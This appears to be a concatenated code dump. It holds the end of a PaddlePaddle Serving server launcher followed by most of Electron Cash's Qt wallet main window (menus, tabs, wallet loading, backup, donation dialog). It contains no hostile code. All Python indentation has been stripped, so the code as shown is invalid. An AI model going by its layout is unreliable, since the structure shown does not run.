op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
else:
#gpu or arm
from paddle_serving_server import OpMaker, OpSeqMaker, Server
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
if gpuid >= 0:
server.set_gpuid(gpuid)
# TODO: support arm or arm + xpu later
server.set_device(self._device_name)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.load_model_config(self._model_config)
server.prepare_server(
workdir=workdir, port=port, device=self._device_name)
if self._fetch_names is None:
self._fetch_names = server.get_fetch_list()
return server
def _start_one_server(self, service_idx):
"""
Start one server
Args:
service_idx: server index
Returns:
None
"""
self._rpc_service_list[service_idx].run_server()
def prepare_server(self):
"""
Prepare all servers to be started, and append them into list.
"""
for i, device_id in enumerate(self._devices):
if self._workdir != "":
workdir = "{}_{}".format(self._workdir, i)
else:
workdir = _workdir_name_gen.next()
self._rpc_service_list.append(
self._prepare_one_server(
workdir,
self._port_list[i],
device_id,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim))
def start_server(self):
"""
Start multiple processes and start one server in each process
"""
for i, _ in enumerate(self._rpc_service_list):
p = multiprocessing.Process(
target=self._start_one_server, args=(i, ))
p.daemon = True
self._server_pros.append(p)
for p in self._server_pros:
p.start()
|
main_window.py | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
import copy
import csv
import json
import os
import shutil
import sys
import threading
import time
import traceback
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
from functools import partial
from collections import OrderedDict
from typing import List
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
ExcessiveFee, UserCancelled, InvalidPassword,
bh2u, bfh, format_fee_satoshis, Weak,
print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands, cashacct
from electroncash import paymentrequest
from electroncash.transaction import OPReturn
from electroncash.wallet import Multisig_Wallet, sweep_preparations
from electroncash.contacts import Contact
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel
from . import cashacctqt
from .util import *
try:
# pre-load QtMultimedia at app start, if possible
# this is because lazy-loading it from within Python
# callbacks led to crashes on Linux, likely due to
# bugs in PyQt5 (crashes wouldn't happen when testing
# with PySide2!).
from PyQt5.QtMultimedia import QCameraInfo
del QCameraInfo # defensive programming: not always available so don't keep name around
except ImportError as e:
pass # we tried to pre-load it, failure is ok; camera just won't be available
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
else:
super().keyPressEvent(e)
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal as well which also indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
ca_address_default_changed_signal = pyqtSignal(object) # passes cashacct.Info object to slot, which is the new default. Mainly emitted by address_list and address_dialog
status_icon_dict = dict() # app-globel cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
assert not self.wallet.weak_window
self.wallet.weak_window = Weak.ref(self) # This enables plugins such as CashFusion to keep just a reference to the wallet, but eventually be able to find the window it belongs to.
self.config = config = gui_object.config
assert self.wallet and self.config and self.gui_object
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.tx_sound = self.setup_tx_rcv_sound()
self.cashaddr_toggled_signal = self.gui_object.cashaddr_toggled_signal # alias for backwards compatibility for plugins -- this signal used to live in each window and has since been refactored to gui-object where it belongs (since it's really an app-global setting)
self.force_use_single_change_addr = None # this is set by the CashShuffle plugin to a single string that will go into the tool-tip explaining why this preference option is disabled (see self.settings_dialog)
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self._shortcuts = Weak.Set() # keep track of shortcuts and disable them on close
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.converter_tab = self.create_converter_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=True):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console", False)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak.ref(tabs) # We use a weak reference here to help along python gc of QShortcut children: prevent the lambdas below from holding a strong ref to self.
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+W"), self, self.close) )
# Below is now addded to the menu as Ctrl+R but we'll also support F5 like browsers do
self._shortcuts.add( QShortcut(QKeySequence("F5"), self, self.update_wallet) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() - 1)%wrtabs().count())) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() + 1)%wrtabs().count())) )
for i in range(tabs.count()):
self._shortcuts.add( QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs() and wrtabs().setCurrentIndex(i)) )
self.gui_object.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet()
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee', 'ca_verified_tx', 'ca_verification_failed']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def setup_tx_rcv_sound(self):
"""Used only in the 'ard moné edition"""
if networks.net is not networks.TaxCoinNet:
return
try:
import PyQt5.QtMultimedia
from PyQt5.QtCore import QUrl, QResource
from PyQt5.QtMultimedia import QMediaPlayer, QMediaContent
fileName = os.path.join(os.path.dirname(__file__), "data", "ard_mone.mp3")
url = QUrl.fromLocalFile(fileName)
self.print_error("Sound effect: loading from", url.toLocalFile())
player = QMediaPlayer(self)
player.setMedia(QMediaContent(url))
player.setVolume(100)
self.print_error("Sound effect: regustered successfully")
return player
except Exception as e:
self.print_error("Sound effect: Failed:", str(e))
return
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
# do this immediately after this event handler finishes -- noop on everything but linux
def callback():
strongSelf = weakSelf()
if strongSelf:
strongSelf.gui_object.lin_win_maybe_show_highdpi_caveat_msg(strongSelf)
QTimer.singleShot(0, callback)
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window, *, raise_if_missing=False):
try:
self.tl_windows.remove(window)
except ValueError:
if raise_if_missing:
raise
''' Window not in list. Suppressing the exception by default makes
writing cleanup handlers easier. Doing it this way fixes #1707. '''
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
if args[0] is self.wallet:
self.network_signal.emit(event, args)
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
elif event in ('ca_verified_tx', 'ca_verification_failed'):
if args[0] is self.wallet.cashacct:
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
elif event in ('ca_verified_tx', 'ca_verification_failed'):
pass
elif event == 'verified2':
pass
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
def load_wallet(self):
self.wallet.thread = TaskThread(self, self.on_error, name = self.wallet.diagnostic_name() + '/Wallet')
self.update_recently_visited(self.wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
run_hook('load_wallet', self.wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat, InvalidXKeyNotBase58
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyNotBase58:
pass # old_keystore uses some other key format, so we will let it slide.
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
self.wallet.storage.write() # make sure file is committed to disk
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("Open &Recent"))
file_menu.addAction(_("&Open") + "...", self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore") + "...", self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy As") + "...", self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("&Delete") + "...", self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close).setShortcut(QKeySequence.Quit)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys, QKeySequence("Ctrl+I"))
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password") + "...", self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("Private Keys"))
self.private_keys_menu.addAction(_("&Sweep") + "...", self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import") + "...", self.do_import_privkey)
self.export_menu = self.private_keys_menu.addMenu(_("&Export"))
self.export_menu.addAction(_("&WIF Plaintext") + "...", self.export_privkeys_dialog)
self.export_menu.addAction(_("&BIP38 Encrypted") + "...", self.export_bip38_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses") + "...", self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild History") + "...", self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("Scan &More Addresses..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import") + "...", self.do_import_labels)
labels_menu.addAction(_("&Export") + "...", self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("&Contacts"))
contacts_menu.addAction(_("&New") + "...", self.new_contact_dialog)
contacts_menu.addAction(_("Import") + "...", lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export") + "...", lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import") + "...", lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export") + "...", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("&Find"), self.toggle_search, QKeySequence("Ctrl+F"))
wallet_menu.addAction(_("Refresh GUI"), self.update_wallet, QKeySequence("Ctrl+R"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
prefs_tit = _("Preferences") + "..."
a = tools_menu.addAction(prefs_tit, self.settings_dialog, QKeySequence("Ctrl+,") ) # Note: on macOS this hotkey sequence won't be shown in the menu (since it's reserved by the system), but will still work. :/
if sys.platform == 'darwin':
# This turns off the heuristic matching based on name and keeps the
# "Preferences" action out of the application menu and into the
# actual menu we specified on macOS.
a.setMenuRole(QAction.NoRole)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network") + "...", lambda: gui_object.show_network_dialog(weakSelf()), QKeySequence("Ctrl+K"))
tools_menu.addAction(_("Optional &Features") + "...", self.internal_plugins_dialog, QKeySequence("Shift+Ctrl+P"))
tools_menu.addAction(_("Installed &Plugins") + "...", self.external_plugins_dialog, QKeySequence("Ctrl+P"))
if sys.platform.startswith('linux'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware Wallet Support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/Verify Message") + "...", self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/Decrypt Message") + "...", self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to Many"), self.paytomany, QKeySequence("Ctrl+M"))
raw_transaction_menu = tools_menu.addMenu(_("&Load Transaction"))
raw_transaction_menu.addAction(_("From &File") + "...", self.do_process_from_file)
raw_transaction_menu.addAction(_("From &Text") + "...", self.do_process_from_text, QKeySequence("Ctrl+T"))
raw_transaction_menu.addAction(_("From the &Blockchain") + "...", self.do_process_from_txid, QKeySequence("Ctrl+B"))
raw_transaction_menu.addAction(_("From &QR Code") + "...", self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
tools_menu.addSeparator()
if ColorScheme.dark_scheme and sys.platform != 'darwin': # use dark icon in menu except for on macOS where we can't be sure it will look right due to the way menus work on macOS
icon = QIcon(":icons/cashacct-button-darkmode.png")
else:
icon = QIcon(":icons/cashacct-logo.png")
tools_menu.addAction(icon, _("Lookup &Cash Account..."), self.lookup_cash_account_dialog, QKeySequence("Ctrl+L"))
tools_menu.addAction(icon, _("&Register Cash Account..."), lambda: self.register_new_cash_account(addr='pick'), QKeySequence("Ctrl+G"))
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("About Qt"), self.app.aboutQt)
help_menu.addAction(_("&Check for Updates"), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official Website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug..."), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to Server") + "...", self.donate_to_server)
def donate_to_server(self):
if self.gui_object.warn_if_no_network(self):
return
d = {}
spv_address = self.network.get_donation_address()
spv_prefix = _("Blockchain Server")
donation_for = _("Donation for")
if spv_address:
host = self.network.get_parameters()[0]
d[spv_prefix + ": " + host] = spv_address
plugin_servers = run_hook('donation_address', self, multi=True)
for tup in plugin_servers:
if not isinstance(tup, (list, tuple)) or len(tup) != 2:
continue
desc, address = tup
if (desc and address and isinstance(desc, str) and isinstance(address, Address)
and desc not in d and not desc.lower().startswith(spv_prefix.lower())):
d[desc] = address.to_ui_string()
def do_payto(desc):
addr = d[desc]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{pre}:{addr}?message={donation_for} {desc}'
.format(pre = networks.net.CASHADDR_PREFIX,
addr = addr,
donation_for = donation_for,
desc = desc))
if len(d) == 1:
do_payto(next(iter(d.keys())))
elif len(d) > 1:
choices = tuple(d.keys())
index = self.query_choice(_('Please select which server you would like to donate to:'), choices, add_cancel_button = True)
if index is not None:
do_payto(choices[index])
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash",
"<p><font size=+3><b>Electron Cash</b></font></p><p>" + _("Version") + f" {self.wallet.electrum_version}" + "</p>" +
'<span style="font-size:11pt; font-weight:500;"><p>' +
_("Copyright © {year_start}-{year_end} Electron Cash LLC and the Electron Cash developers.").format(year_start=2017, year_end=2021) +
"</p><p>" + _("darkdetect for macOS © 2019 Alberto Sottile") + "</p>"
"</span>" +
'<span style="font-weight:200;"><p>' +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system.") +
"</p></span>"
)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/Electron-Cash/Electron-Cash/issues\">https://github.com/Electron-Cash/Electron-Cash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
